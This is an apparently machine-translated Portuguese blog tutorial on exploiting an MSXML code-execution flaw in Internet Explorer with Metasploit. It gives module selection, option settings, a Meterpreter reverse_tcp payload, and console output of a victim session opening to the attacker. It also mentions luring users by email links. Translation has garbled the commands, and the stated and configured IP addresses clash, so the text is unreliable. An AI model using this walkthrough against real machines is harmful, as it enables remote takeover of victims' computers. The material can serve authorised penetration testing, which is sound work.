Uma vulnerabilidade no Microsoft XML Core Services 3.0, 4.0, 5.0 e 6.0 permite a execução remota de código se um usuário visualiza uma página web especialmente criada usando o Internet Explorer.
Um invasor não teria como forçar os usuários a visitar um site deste tipo. Em vez disso, o invasor teria que convencer os usuários a visitar o site, geralmente fazendo com que eles cliquem em um link em uma mensagem de e-mail ou mensagens instantâneas, que os leva para o site do atacante.
A vulnerabilidade afeta todas as versões suportadas do Microsoft Windows, e todas as edições com suporte do Microsoft Office 2003 e Microsoft Office 2007. Aqui você pode a lista completa.
A vulnerabilidade existe quando MSXML tenta acessar um objeto na memória que não foi inicializado, o que pode corromper a memória de tal maneira que um invasor executar um código arbitrário no contexto do usuário conectado.Vou demonstrar como usar a ferramenta Metasploit para testar se sua rede vulnerável ou não.
Abra o Terminal e digite "msfupdate" para obter as últimas módulos Metasploit. Quando a atualização for concluída, em seguida, digite "msfconsole".
Em seguida, digite o seguinte comando no console "uso explorar / windows / navegador / msxml_get_definition_code_exec".
Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console.
Comando: SRVHOST conjunto 192.168.56.10
Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal.
Comando: lhost conjunto 192.168.56.10
Comando: URIPATH set /
Detalhes: O caminho em que a nossa exploração será executado.
Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp
Digite "proeza" no console.
Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:
[*] Msxml_get_definition_code_exec - Usando msvcrt ROP
[*] Msxml_get_definition_code_exec - 10.0.1.79:1564 - Enviando html
[*] Envio de estágio (752.128 bytes) para 192.168.56.12
[*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1565)
Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter.
Digite "sysinfo" no Meterpreter para obter as informações do sistema.
0 comentários:
Postar um comentário